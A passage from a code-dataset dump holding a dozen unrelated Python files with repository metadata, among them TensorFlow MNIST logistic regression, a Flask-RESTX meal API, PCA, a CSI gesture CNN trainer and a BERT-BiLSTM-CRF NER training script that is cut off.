response = {'status': 'success', 'message': 'File uploaded successfully'}\n return jsonify(response)\n\n\n# Test code to upload a file\nif __name__ == '__main__':\n app.run(host = '127.0.0.1')","repo_name":"mcaledonensis/magickey","sub_path":"api/server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"23398623670","text":"'''\n结合tensorflow实现Logistic回归算法,测试用例是手写体图片\n'''\n\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"../data/MNIST_data/\", one_hot=True)\n\ndef Logistic_Regression(lr = 0.01, training_epochs = 50, batch_size = 100, input_shape=784, output_shape=10):\n # 输入和输入标签的变量设置\n x = tf.placeholder(tf.float32, [None, input_shape])\n y = tf.placeholder(tf.float32, [None, 10])\n # 权值矩阵和偏置值的变量设置\n W = tf.Variable(tf.zeros([input_shape, output_shape]))\n b = tf.Variable(tf.zeros([output_shape]))\n\n # 预测函数是softmax函数,其实就是logistic二分类器的多分类形式\n pred = tf.nn.softmax(tf.matmul(x, W) + b)\n # 损失函数是使用交叉熵函数\n cost = tf.reduce_mean(-tf.reduce_sum(y*tf.log(pred), reduction_indices=1))\n # 优化迭代器使用的是梯度下降,注意格式\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=lr).minimize(cost)\n # 初始化所有变量\n init = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n sess.run(init)\n for epoch in range(training_epochs):\n avg_cost = 0\n # 总共的批次数\n total_batch = int(mnist.train.num_examples/batch_size)\n #\n for i in range(total_batch):\n # 提取每个批次的训练数据\n batch_xs, batch_yx = mnist.train.next_batch(batch_size)\n # 开始模型的奔跑\n _, c = sess.run([optimizer, cost], feed_dict={x: batch_xs, y: batch_yx})\n # 计算平均损失\n avg_cost += c/total_batch\n\n if (epoch + 1) % 1 == 0:\n # 每1轮都输出cost值\n print(\"Epoch:\", '%04d' % (epoch + 1), \"cost=\", \"{:.9f}\".format(avg_cost))\n print(\"Optimization Finished!\")\n\n # 开始检验模型\n correction_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\n # 模型的检验准确率\n accuracy = tf.reduce_mean(tf.cast(correction_prediction, tf.float32))\n print(\"Accuracy:\", accuracy.eval({x: mnist.test.images[:3000], y: mnist.test.labels[:3000]}))\n\nif __name__ == \"__main__\":\n Logistic_Regression(lr=0.01, training_epochs=50, batch_size=100, input_shape=784, output_shape=10)\n\n\n","repo_name":"FLYYZJ/machine_learning_algorithms","sub_path":"Logistic_Regression/Logistic_Regression_TF.py","file_name":"Logistic_Regression_TF.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"20"} +{"seq_id":"86636909735","text":"from collections import defaultdict\n\n\ndef solution(survey, choices):\n score = defaultdict(int)\n indices = [\"RT\", \"CF\", \"JM\", \"AN\"]\n answer = \"\"\n\n # 각 항목의 점수를 계산\n for s, c in zip(survey, choices):\n a, b = s[0], s[1]\n score[a] += max(4 - c, 0)\n score[b] += max(c - 4, 0)\n\n # 지표별 유형 판별\n for index in indices:\n a, b = index[0], index[1]\n if score[a] >= score[b]:\n answer += a\n else:\n answer += b\n return answer\n\n\n\nif __name__ == \"__main__\":\n s = [\"AN\", \"CF\", \"MJ\", \"RT\", \"NA\"]\n c = [5, 3, 2, 7, 5]\n print(solution(s, c))\n","repo_name":"SeoHyeonMyeong/Coding-test-study-kakao","sub_path":"test/성격_유형_검사하기.py","file_name":"성격_유형_검사하기.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"36047886168","text":"\"\"\"\nloading utils for SAM 
busniess\n\"\"\"\nimport os\nimport glob\nimport random\nrandom.seed(42)\n\nfrom my_SAM.config import image_exts\n\n\"\"\"\nloading yolo text files\n\"\"\"\n\n\ndef get_class_id_bbox_seg_from_yolo(txt_path):\n \"\"\"\n gets each line as a seperate bbox\n :param txt_file: the text file corresponding to the image\n :return: class_id and bbox or class_id, boox, seg\n \"\"\"\n lines = read_txt_file(txt_path)\n yolo_bboxes, class_ids, segs = convert_text_lines_to_yolo_format(lines)\n\n return class_ids, yolo_bboxes, segs\n\n\ndef read_txt_file(txt_path):\n txt_file = open(txt_path, \"r\")\n lines = txt_file.read().splitlines()\n return lines\n\n\ndef convert_text_lines_to_yolo_format(lines):\n bboxes = []\n class_ns = []\n segs = []\n for idx, line in enumerate(lines):\n value = line.split()\n cls = int(value[0])\n x = float(value[1])\n y = float(value[2])\n w = float(value[3])\n h = float(value[4])\n #if we have segmentation data append it\n if len(line) > 5:\n segs.append([float(i) for i in value[5:]])\n\n bboxes.append([x,y,w,h])\n class_ns.append(cls)\n\n return bboxes, class_ns, segs\n\n\ndef get_random_image_ann_path_from_image_paths(image_paths, ann_folder):\n image_path = random.choice(image_paths)\n ann_path = os.path.join(ann_folder, os.path.splitext(os.path.basename(image_path))[0] + '.txt')\n return image_path, ann_path\n\n\n\"\"\"\n###\n###\n\"\"\"\n\ndef get_annotation_path(image_path, ann_dir):\n \"\"\"\n Given an image path and an annotation directory, return the annotation file path\n with the same name as the image file but with a .txt extension.\n\n Args:\n image_path (str): The path to the image file.\n ann_dir (str): The directory where the annotation file should be saved.\n\n Returns:\n The annotation file path as a string.\n \"\"\"\n basename = os.path.basename(image_path)\n annotation_name = os.path.splitext(basename)[0] + '.txt'\n annotation_path = os.path.join(ann_dir, annotation_name)\n assert os.path.exists(annotation_path), f'PATH: {annotation_path} \\nDOES NOT EXIST'\n\n return annotation_path\n\n\ndef glob_image_files(image_folder, exts=image_exts):\n image_paths = []\n for ext in exts:\n # Use glob to search for files with the current extension\n files = glob.glob(os.path.join(image_folder,'*' + ext))\n # Extend the matching_files list with the found file paths\n image_paths.extend(files)\n\n return image_paths","repo_name":"regs08/my_SAM","sub_path":"utils/loading_utils.py","file_name":"loading_utils.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"12450856279","text":"# http://www.codeskulptor.org/#user21_4vsRqDxBUR6cYHq.py\n\n# template for \"Stopwatch: The Game\"\nimport simplegui\n\n# define global variables\ntime = 0\nsuccessful_stop = 0\ntotal_stop = 0\n\n# define helper function format that converts time\n# in tenths of seconds into formatted string A:BC.D\ndef format(t):\n minute = t // 600\n second = (t % 600) // 10\n tenth_second = t % 10\n if second < 10:\n str_second = \"0\" + str(second)\n else:\n str_second = str(second)\n return str(minute) + \":\" + str_second + \".\" + str(tenth_second)\n \n# define event handlers for buttons; \"Start\", \"Stop\", \"Reset\"\ndef start():\n timer.start()\n \ndef stop():\n global total_stop, successful_stop\n if timer.is_running():\n total_stop = total_stop + 1\n timer.stop()\n if time % 10 == 0:\n successful_stop = successful_stop + 1\n \ndef reset():\n global time, successful_stop, total_stop\n time = 0\n 
successful_stop = 0\n total_stop = 0\n\n# define event handler for timer with 0.1 sec interval\ndef timer_handler():\n global time\n time = time + 1\n\n# define draw handler\ndef draw_handler(canvas):\n canvas.draw_text(format(time), [100, 100], 40, \"red\")\n canvas.draw_text(str(successful_stop) + \"/\" + str(total_stop), \n [250, 40], 20, \"red\")\n \n# create frame\nframe = simplegui.create_frame(\"Stop Watch\", 300, 200)\ntimer = simplegui.create_timer(100, timer_handler)\n\n# register event handlers\nstart_button = frame.add_button(\"Start\", start, 200)\nstop_button = frame.add_button(\"Stop\", stop, 200)\nreset_button = frame.add_button(\"Reset\", reset, 200)\nframe.set_draw_handler(draw_handler)\n\n# start frame\nframe.start()","repo_name":"aglove2189/Coursera-IntPy","sub_path":"003-Stopwatch.py","file_name":"003-Stopwatch.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"72146763568","text":"def main():\n # 오른쪽 위 / 중간 / 아래\n dy = (1, 0, -1) \n for _ in range(int(input())):\n n, m = list(map(int,input().split()))\n gold_nums = list(map(int,input().split()))\n s, e = 0, 0\n gold = []\n for i in range(n):\n s = e\n e = m * (i + 1)\n gold.append(gold_nums[s:e])\n\n dp = [[0 for _ in range(m)] for _ in range(n)]\n for i in range(len(gold)):\n dp[i][0] = gold[i][0]\n\n \n for x in range(1, m):\n for y in range(n):\n for i in range(3):\n py = y + dy[i]\n px = x - 1\n if py < 0 or py>=n:\n continue\n\n dp[y][x] = max(dp[y][x], dp[py][px] + gold[y][x])\n\n answer = 0\n for i in range(n):\n if answer < dp[i][m-1]:\n answer = dp[i][m-1]\n \n print(answer)\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"Gnu-Kenny/Like-Python","sub_path":"Algorithm/이코테/DP/금광.py","file_name":"금광.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"12239505671","text":"import time as t\n\nyear = int(input('请输入年:'))\nmonth = int(input('请输入月:'))\nday = int(input('请输入日:'))\n\n# 获得出生时间元组:\nbirthday_tuple = (year,month,day,0,0,0,0,0,0)\n\n# 获得出生时的秒数:\nbirthday_second = t.mktime(birthday_tuple)\n\n# 获得当前时间的秒数:\ncur_second = t.time()\n\n# 计算出生到现在的天数:\nseconds = (cur_second-birthday_second)\nminutes = seconds / 60\nhours = minutes / 60\ndays = hours / 24\nmonths = days / 30\nyears = days / 365\nprint(seconds,minutes,hours,days,months,years,sep='\\n')\n\n# 计算出生时的详细信息:\n# 转回到时间本地元组:\ntime_info = t.localtime(birthday_second)\nweekday = {0:'一',1:'二',2:'三',3:'四',4:'五',5:'六',6:'日'} \nprint('你出生的那天是:星期',weekday[time_info[6]])","repo_name":"LzWaiting/00.pythonbase","sub_path":"code/module/time_module.py","file_name":"time_module.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27150243100","text":"from flask_restx import Api,Resource,marshal,fields\nfrom flask import Blueprint,jsonify,request\nfrom .models import Meal\nfrom .exts import db\n\n\napi_bp=Blueprint('api',__name__)\n\napi=Api(api_bp)\n\n#serialization model\n\nmodel=api.model(\n 'Meal',\n {\n \"id\":fields.Integer(),\n \"name\":fields.String(),\n \"price\":fields.Integer(),\n \"description\":fields.String()\n })\n\n@api.route('/meals')\nclass MealResource(Resource):\n #get all meals\n def get(self):\n meals=Meal.get_meals_descending()\n\n return marshal(meals,fields=model,envelope=\"meals\")\n #create a new meal resource\n def post(self):\n 
data=request.get_json()\n\n new_meal=Meal(name=data.get('name'),price=data.get('price'),description=data.get('description'))\n\n new_meal.save()\n\n return marshal(new_meal,fields=model,envelope=\"meal\")\n\n\n@api.route('/meal/')\nclass MealResourceID(Resource):\n #get a resource by id\n def get(self,id):\n meal=Meal.get_by_id(id)\n\n return marshal(meal,fields=model,envelope=\"meal\")\n #update a resource by id\n def put(self,id):\n meal=Meal.get_by_id(id)\n\n data=request.get_json()\n\n meal.name=data.get('name')\n\n meal.price=data.get('price')\n\n meal.description=data.get('description')\n\n db.session.commit()\n\n return marshal(meal,fields=model,envelope=\"meal\")\n # delete a resource by its id\n def delete(self,id):\n meal=Meal.get_by_id(id)\n meal.delete()\n return marshal(meal,fields=model,envelope=\"meal\")\n\n\n\n\n","repo_name":"jod35/meals","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73986963566","text":"from sklearn.metrics import confusion_matrix\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom tensorflow import keras\r\nfrom keras import layers\r\nimport matplotlib.pyplot as plt\r\nfrom keras.utils.np_utils import to_categorical\r\nimport importlib\r\nimport config\r\nimport os\r\nfrom numpy.random import seed\r\nimport tensorflow as tf\r\nimport getData\r\nfrom keras.callbacks import LearningRateScheduler\r\nimport seaborn as sns\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '-1'\r\nfrom sklearn.preprocessing import LabelEncoder\r\n\r\nseed(30)\r\ntf.random.set_seed(20)\r\n\r\n# variables need to change for each training\r\ntest_ratio = 0.3 # test size\r\nNw = 3 # number of classes\r\nfilt = 32 # filters\r\nk_size = 3 # kernel_size\r\nepoch = 50\r\nbatch_size = 64\r\nmodel_name = \"lab1500\"\r\ntraining = True # set to train or calculate validation confusion matrix\r\n\r\ndecoder = importlib.import_module(f'decoders.{config.decoder}') # This is also an import\r\n\r\ndirectories = ['pcapfiles/down','pcapfiles/left', 'pcapfiles/right']\r\n# directories = ['pcapfiles/lab700/down', 'pcapfiles/lab700/left', 'pcapfiles/lab700/name', 'pcapfiles/lab700/right',\r\n# 'pcapfiles/lab700/stop']\r\n#\r\n# directories = ['pcapfiles/home/five', 'pcapfiles/home/fixed', 'pcapfiles/home/one', 'pcapfiles/home/ok',\r\n# 'pcapfiles/home/wave']\r\ncsi, label = getData.get_data(directories)\r\nprint(csi.shape)\r\n# number of classes\r\ncsi_train, csi_test, label_train, label_test = train_test_split(csi, label, test_size=test_ratio, random_state=5)\r\n\r\nif training:\r\n label_train = to_categorical(label_train, Nw)\r\n label_test = to_categorical(label_test, Nw)\r\n [T, M, N, S] = csi.shape\r\n model = keras.Sequential([\r\n keras.Input(shape=(M,N,S)),\r\n layers.Conv2D(filters=filt,kernel_size=k_size,padding=\"valid\"),\r\n layers.BatchNormalization(),\r\n layers.Activation(\"relu\"),\r\n layers.MaxPooling2D(pool_size=(3,3),strides=(3,3)),\r\n layers.Conv2D(filters=32, kernel_size=(3, 3), padding=\"valid\"),\r\n layers.BatchNormalization(),\r\n layers.Activation(\"relu\"),\r\n layers.MaxPooling2D(pool_size=(3, 3), strides=(3, 3)),\r\n layers.Flatten(),\r\n layers.Dense(Nw, activation=\"softmax\")\r\n ])\r\n\r\n\r\n # reduce lr when epoch increases\r\n def lr_scheduler(epoch, lr):\r\n if epoch < 10:\r\n return lr\r\n elif 10 <= epoch < 30:\r\n return 0.001\r\n else:\r\n return 0.0001\r\n\r\n\r\n opt = 
keras.optimizers.SGD(learning_rate=0.01, momentum=0.9)\r\n model.compile(loss=\"categorical_crossentropy\",\r\n optimizer=opt,\r\n metrics=[\"accuracy\"])\r\n\r\n lr_callback = LearningRateScheduler(lr_scheduler)\r\n\r\n history = model.fit(\r\n csi_train, label_train,\r\n epochs=epoch,\r\n batch_size= batch_size,\r\n validation_data=(csi_test, label_test),\r\n callbacks=[lr_callback]\r\n )\r\n\r\n model.save(model_name)\r\n accuracy = history.history[\"accuracy\"]\r\n val_accuracy = history.history[\"val_accuracy\"]\r\n loss = history.history[\"loss\"]\r\n val_loss = history.history[\"val_loss\"]\r\n epochs = range(1, len(accuracy) + 1)\r\n plt.plot(epochs, accuracy, \"r\", label=\"Training accuracy\")\r\n plt.scatter(epochs, accuracy, c='r', marker='x')\r\n plt.plot(epochs, val_accuracy, \"b\", label=\"Validation accuracy\")\r\n plt.scatter(epochs, val_accuracy, c='b', marker='x')\r\n plt.title(\"Training and validation accuracy\")\r\n plt.legend()\r\n plt.figure()\r\n plt.plot(epochs, loss, \"r\", label=\"Training loss\")\r\n plt.scatter(epochs, loss, c='r', marker='x')\r\n plt.plot(epochs, val_loss, \"b\", label=\"Validation loss\")\r\n plt.scatter(epochs, val_loss, c='b', marker='x')\r\n plt.title(\"Training and validation loss\")\r\n plt.legend()\r\n plt.show()\r\n\r\n# validation confusion matrix\r\nelse:\r\n model = keras.models.load_model(model_name)\r\n y_pred = np.argmax(model.predict(csi_test), axis=-1)\r\n cm = confusion_matrix(label_test, y_pred)\r\n sns.heatmap(cm, annot=True, cmap='Blues', fmt='g')\r\n plt.xlabel('Predicted')\r\n plt.ylabel('True')\r\n plt.show()\r\n","repo_name":"Z-Yannn/FYP-Gesture-Recognition-Using-Deep-Learning-and-Wi-Fi","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"73614032366","text":"#!/usr/bin/env python36\n# -*- coding: utf-8 -*-\n\nfrom collections import deque\n\n\ndef search(lines, pattern, history=5):\n previous_line = deque(maxlen=history)\n for line in lines:\n if pattern in line:\n yield line, previous_line\n previous_line.append(line)\n\n\nif __name__ == '__main__':\n with open(r'readme.md') as f:\n for line, previous_line in search(f, 'python', 5):\n for pline in previous_line:\n print(pline, end='')\n print(line, end='')\n print('-' * 20)\n\n","repo_name":"cutecat0/ArtsofData","sub_path":"data_science/python_part_basic/cookbook_practice/data_struct_algorithm/03_keep_last_n_elements.py","file_name":"03_keep_last_n_elements.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"5450128595","text":"import numpy as np\n\ndef pca(X, k): # k自己设置(降维后的维度)\n # 各特征的平均值\n n_samples, n_features = X.shape\n mean = np.array([np.mean(X[:, i]) for i in range(n_features)])\n # 标准化\n norm_X = X - mean\n # 求出协方差\n scatter_matrix = np.dot(np.transpose(norm_X), norm_X)\n # 计算特征向量和特征值\n eig_val, eig_vec = np.linalg.eig(scatter_matrix)\n eig_pairs = [(np.abs(eig_val[i]), eig_vec[:, i]) for i in range(n_features)]\n # 特征值从高到低排序\n eig_pairs.sort(reverse=True)\n # 按照K值排列特征向量数量\n feature = np.array([ele[1] for ele in eig_pairs[:k]])\n # 得到降维后的矩阵\n data = np.dot(norm_X, np.transpose(feature))\n return data\n\nif __name__ == '__main__':\n X = np.array([[-1, 1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])\n\n print(pca(X, 
1))","repo_name":"AI-Bai/algorithm","sub_path":"PCA/白建宝/PCA/get_pca.py","file_name":"get_pca.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71396771886","text":"# Based on : https://github.com/jhasegaw/phonecodes/blob/master/src/phonecode_tables.py\narpabet2aline_dict = {\n 'AA':'ɑ',\n 'AE':'æ',\n 'AH':'ʌ',\n 'AH0':'ə',\n 'AO':'ɔ',\n 'AW':'aʊ',\n 'AY':'aɪ',\n 'EH':'ɛ',\n 'ER':'ɝ',\n 'EY':'eɪ',\n 'IH':'ɪ',\n 'IH0':'ɨ',\n 'IY':'i',\n 'OW':'oʊ',\n 'OY':'ɔɪ',\n 'UH':'ʊ',\n 'UW':'u',\n 'B':'b',\n 'CH':'tʃ',\n 'D':'d',\n 'DH':'ð',\n# 'EL':'l̩ ', # Unused by cmudict ((syllabic)\n# 'EM':'m̩',# Unused by cmudict (syllabic)̩\n# 'EN':'n̩', # Unused by cmudict (syllabic)\n 'F':'f',\n 'G':'g',\n 'HH':'h',\n 'JH':'dʒ',\n 'K':'k',\n 'L':'l',\n 'M':'m',\n 'N':'n',\n 'NG':'ŋ',\n 'P':'p',\n 'Q':'ʔ',\n 'R':'ɹ',\n 'S':'s',\n 'SH':'ʃ',\n 'T':'t',\n 'TH':'θ',\n 'V':'v',\n 'W':'w',\n# 'WH':'ʍ', # Unused by cmudict\n 'Y':'j',\n 'Z':'z',\n 'ZH':'ʒ'\n}\n'''Converts list of arpabet phonemes to aline IPA phonemes'''\ndef arpa2aline(arpa_phonemes):\n aline_phonemes = []\n for arpa in arpa_phonemes:\n if arpa not in arpabet2aline_dict:\n raise Exception(arpa + ' not found in list of known arpabet\\\n phonemes')\n aline_phonemes.append(arpabet2aline_dict[arpa])\n return aline_phonemes\n","repo_name":"DanielLoney/auto-rap-highlighter","sub_path":"src/aline/arpa2aline.py","file_name":"arpa2aline.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"43703895061","text":"from bert.bert import modeling, optimization, tokenization\nimport tensorflow as tf\nfrom blstm_crf.model.lstm_crf_layer import BLSTM_CRF\nfrom blstm_crf.utils import tf_metrics\nfrom tensorflow.contrib.layers.python.layers import initializers\nfrom blstm_crf.utils.data_processor import NerProcessor\nimport os\nimport json\nimport codecs\nfrom blstm_crf.utils.util import file_based_input_fn_builder, filed_based_convert_examples_to_features\nimport logging\nimport pickle\nfrom blstm_crf.utils.conlleval import return_report\nimport traceback\n\n\nconfig_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'config')\nparams_path = os.path.join(config_path, 'params.json')\nlog_path = os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'log.txt')\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n filename=log_path)\nlogger = logging.getLogger(__name__)\n\ndef create_model(bert_config, is_training, input_ids, input_mask,\n segment_ids, labels, num_labels, use_one_hot_embeddings, params):\n model = modeling.BertModel(config=bert_config,\n is_training=is_training,\n input_ids=input_ids,\n input_mask=input_mask,\n token_type_ids=segment_ids,\n use_one_hot_embeddings=use_one_hot_embeddings)\n embedding = model.get_sequence_output()\n max_seq_length = embedding.shape[1].value\n\n used = tf.sign(tf.abs(input_ids))\n lengths = tf.reduce_sum(used, reduction_indices=1)\n\n blstm_crf = BLSTM_CRF(embedded_chars=embedding, hidden_unit=params.lstm_size, cell_type=params.cell,\n num_layers=params.num_layers,\n droupout_rate=params.dropout_rate, initializers=initializers, num_labels=num_labels,\n seq_length=max_seq_length, labels=labels, lengths=lengths, is_training=is_training)\n rst = blstm_crf.add_blstm_crf_layer()\n return rst\n\n\ndef model_fn_builder(bert_config, num_labels, 
init_checkpoint, learning_rate,\n num_train_steps, num_warmup_steps,\n use_one_hot_embeddings, out_params):\n \"\"\"\n 构建模型\n :param bert_config:\n :param num_labels:\n :param init_checkpoint:\n :param learning_rate:\n :param num_train_steps:\n :param num_warmup_steps:\n :param use_tpu:\n :param use_one_hot_embeddings:\n :return:\n \"\"\"\n\n def model_fn(features, labels, mode, params):\n tf.logging.info(\"*** Features ***\")\n for name in sorted(features.keys()):\n tf.logging.info(\" name = %s, shape = %s\" % (name, features[name].shape))\n input_ids = features[\"input_ids\"]\n input_mask = features[\"input_mask\"]\n segment_ids = features[\"segment_ids\"]\n label_ids = features[\"label_ids\"]\n\n print('shape of input_ids', input_ids.shape)\n # label_mask = features[\"label_mask\"]\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n\n # 使用参数构建模型,input_idx 就是输入的样本idx表示,label_ids 就是标签的idx表示\n (total_loss, logits, trans, pred_ids) = create_model(\n bert_config, is_training, input_ids, input_mask, segment_ids, label_ids,\n num_labels, use_one_hot_embeddings, out_params)\n\n tvars = tf.trainable_variables()\n # 加载BERT模型\n if init_checkpoint:\n (assignment_map, initialized_variable_names) = modeling.get_assignment_map_from_checkpoint(tvars,\n init_checkpoint)\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n\n tf.logging.info(\"**** Trainable Variables ****\")\n\n # 打印加载模型的参数\n # for var in tvars:\n # init_string = \"\"\n # if var.name in initialized_variable_names:\n # init_string = \", *INIT_FROM_CKPT*\"\n # tf.logging.info(\" name = %s, shape = %s%s\", var.name, var.shape,\n # init_string)\n output_spec = None\n if mode == tf.estimator.ModeKeys.TRAIN:\n train_op = optimization.create_optimizer(\n total_loss, learning_rate, num_train_steps, num_warmup_steps, None)\n output_spec = tf.estimator.EstimatorSpec(\n mode=mode,\n loss=total_loss,\n train_op=train_op) # 钩子,这里用来将BERT中的参数作为我们模型的初始值\n elif mode == tf.estimator.ModeKeys.EVAL:\n # 针对NER ,进行了修改\n def metric_fn(label_ids, logits, trans):\n # 首先对结果进行维特比解码\n # crf 解码\n\n weight = tf.sequence_mask(out_params.max_seq_length)\n precision = tf_metrics.precision(label_ids, pred_ids, num_labels, [2, 3, 4, 5, 6, 7], weight)\n recall = tf_metrics.recall(label_ids, pred_ids, num_labels, [2, 3, 4, 5, 6, 7], weight)\n f = tf_metrics.f1(label_ids, pred_ids, num_labels, [2, 3, 4, 5, 6, 7], weight)\n\n return {\n \"eval_precision\": precision,\n \"eval_recall\": recall,\n \"eval_f\": f,\n # \"eval_loss\": loss,\n }\n\n eval_metrics = metric_fn(label_ids, logits, trans)\n # eval_metrics = (metric_fn, [label_ids, logits])\n output_spec = tf.estimator.EstimatorSpec(\n mode=mode,\n loss=total_loss,\n eval_metric_ops=eval_metrics) #\n else:\n predictions = {\n 'pred_ids': pred_ids\n }\n export_outputs = {\n 'prediction': tf.estimator.export.PredictOutput(predictions)\n }\n output_spec = tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=predictions,\n export_outputs=export_outputs\n )\n return output_spec\n\n return model_fn\n\n\ndef main(_):\n processors = {\n \"ner\": NerProcessor\n }\n logger.info(\"load param\")\n with open(params_path) as param:\n params_dict = json.load(param)\n params = tf.contrib.training.HParams(**params_dict)\n bert_path = params.bert_path\n root_path = params.root_path\n bert_config_file = os.path.join(bert_path, params.bert_config_file)\n logger.info(\"load bert config\")\n bert_config = modeling.BertConfig.from_json_file(bert_config_file)\n if params.max_seq_length >bert_config.max_position_embeddings:\n 
raise ValueError(\n \"Cannot use sequence length %d because the BERT model \"\n \"was only trained up to sequence length %d\" %\n (params.max_seq_length, bert_config.max_position_embeddings))\n logger.info(\"clean train's output_dir\")\n data_config_path = os.path.join(root_path, params.data_config_path)\n print(data_config_path)\n output_dir = os.path.join(root_path, params.output_dir)\n print(output_dir)\n if params.clean and params.do_train:\n if os.path.exists(output_dir):\n def del_file(path):\n ls = os.listdir(path)\n for i in ls:\n c_path = os.path.join(path, i)\n if os.path.isdir(c_path):\n del_file(c_path)\n else:\n os.remove(c_path)\n try:\n del_file(output_dir)\n except Exception as e:\n print(\"output_dir:{} \".format(output_dir) + traceback.format_exc())\n print('pleace remove the files of output dir and data.conf')\n exit(-1)\n if os.path.exists(data_config_path):\n try:\n os.remove(data_config_path)\n except Exception as e:\n print(\"data_config_path:{} \".format(data_config_path) + traceback.format_exc())\n print('pleace remove the files of output dir and data.conf')\n exit(-1)\n task_name = params.task_name.lower()\n if task_name not in processors:\n raise ValueError('Task not found: %s' % (task_name))\n\n processor = processors[task_name]()\n label_list = processor.get_labels()\n vocab_file = os.path.join(bert_path, params.vocab_file)\n tokenizer = tokenization.FullTokenizer(vocab_file=vocab_file,\n do_lower_case=params.do_lower_case)\n\n logger.info('estimator runconfig')\n run_config = tf.estimator.RunConfig(model_dir=output_dir,\n tf_random_seed=19830610,\n save_checkpoints_steps=params.save_checkpoints_steps)\n train_examples = None\n num_train_steps = None\n num_warmup_steps = None\n\n if os.path.exists(data_config_path):\n with codecs.open(data_config_path) as fd:\n data_config = json.load(fd)\n else:\n data_config = {}\n data_dir = os.path.join(root_path, params.data_dir)\n print(\"data_dir: {}\".format(data_dir))\n if params.do_train:\n logger.info(\"load train data\")\n if len(data_config) == 0:\n\n train_examples = processor.get_train_examples(data_dir)\n num_train_steps = int(\n len(train_examples) / params.train_batch_size * params.num_train_epochs)\n num_warmup_steps = int(num_train_steps * params.warmup_proportion)\n\n data_config['num_train_steps'] = num_train_steps\n data_config['num_warmup_steps'] = num_warmup_steps\n data_config['num_train_size'] = len(train_examples)\n else:\n num_train_steps = int(data_config['num_train_steps'])\n num_warmup_steps = int(data_config['num_warmup_steps'])\n init_checkpoint = os.path.join(bert_path, params.init_checkpoint)\n logger.info(\"achieve model_fn\")\n model_fn = model_fn_builder(\n bert_config=bert_config,\n num_labels=len(label_list) + 1,\n init_checkpoint=init_checkpoint,\n learning_rate=params.learning_rate,\n num_train_steps=num_train_steps,\n num_warmup_steps=num_warmup_steps,\n use_one_hot_embeddings=False,\n out_params=params\n )\n if params.do_train:\n batch_size = params.train_batch_size\n elif params.do_eval:\n batch_size = params.eval_batch_size\n else:\n batch_size = params.predict_batch_size\n estimator = tf.estimator.Estimator(\n model_fn=model_fn,\n config=run_config,\n params={'batch_size':batch_size}\n )\n if params.do_train:\n logger.info(\"convert data type to tfrecord\")\n if data_config.get('train.tf_record_path', '') == '':\n train_file = os.path.join(output_dir, \"train.tf_record\")\n filed_based_convert_examples_to_features(\n train_examples, label_list, params.max_seq_length, tokenizer, 
train_file, mode=None, output_dir=output_dir)\n else:\n train_file = data_config.get('train.tf_record_path')\n num_train_size = num_train_size = int(data_config['num_train_size'])\n logger.info(\"***** Running training *****\")\n logger.info(\" Num examples = %d\", num_train_size)\n logger.info(\" Batch size = %d\", params.train_batch_size)\n logger.info(\" Num steps = %d\", num_train_steps)\n\n logger.info(\"read train batch data\")\n train_input_fn = file_based_input_fn_builder(\n input_file=train_file,\n seq_length=params.max_seq_length,\n is_training=True,\n drop_remainder=True)\n estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)\n if params.do_eval:\n logger.info(\"achieve eval data\")\n if data_config.get('eval.tf_record_path', '') == '':\n eval_examples = processor.get_dev_examples(data_dir)\n eval_file = os.path.join(output_dir, \"eval.tf_record\")\n filed_based_convert_examples_to_features(\n eval_examples, label_list, params.max_seq_length, tokenizer, eval_file, output_dir=output_dir)\n data_config['eval.tf_record_path'] = eval_file\n data_config['num_eval_size'] = len(eval_examples)\n else:\n eval_file = data_config['eval.tf_record_path']\n num_eval_size = data_config.get('num_eval_size', 0)\n logger.info(\"***** Running evaluation *****\")\n logger.info(\" Num examples = %d\", num_eval_size)\n logger.info(\" Batch size = %d\", params.eval_batch_size)\n eval_steps = None\n eval_drop_remainder = False\n eval_input_fn = file_based_input_fn_builder(\n input_file=eval_file,\n seq_length=params.max_seq_length,\n is_training=False,\n 